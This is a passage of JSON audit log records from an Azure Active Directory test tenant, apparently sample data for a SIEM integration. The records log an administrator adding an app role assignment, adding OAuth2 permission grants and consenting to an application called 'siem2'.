"{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", 
"Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": 
"env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": 
[{"NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, 
{"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"NewValue": "", "OldValue": "", "Name": "ConsentContext.Tags"}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", 
"Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, 
{"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 
98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": 
